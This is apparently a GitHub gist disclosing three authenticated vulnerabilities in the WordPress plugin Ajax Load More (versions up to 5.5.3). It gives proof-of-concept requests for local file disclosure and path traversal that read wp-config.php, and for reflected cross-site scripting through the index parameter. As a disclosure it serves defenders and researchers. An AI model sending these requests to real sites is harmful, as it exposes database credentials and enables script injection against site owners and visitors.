Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Ajax Load More <= 5.5.3 Multiple Vulnerabilities

Ajax Load More <= 5.5.3 Multiple Vulnerabilities

Authenticated Information Disclosure / Local File Disclosure:

"ajax-load-more-repeaters" AJAX action is vulnerable to "Full Path Disclosure" since full path of webserver file name can be seen in the request. Arbitrary filename can be provided as input via parameter "alm_repeaters_export" to view the file contents. PoC for reading WordPress Configuration file:

POST /wp-admin/admin.php?page=ajax-load-more-repeaters
alm_repeaters_export=/var/www/html/wp-config.php

LFD Vulnerable file: admin/admin.php

Authenticated Cross-Site Scripting:

PoC:

/wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1"><script>alert(1)</script>&nonce={nonce}

Parameter index is not properly sanitized. Vulnerable file: admin/admin.php XSS

Authenticated Path traversal to arbitrary file read:

PoC:

/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce={nonce}
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../wp-config&alias=&nonce={nonce}

Path_Traversal

Vulnerable file: admin/admin.php

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment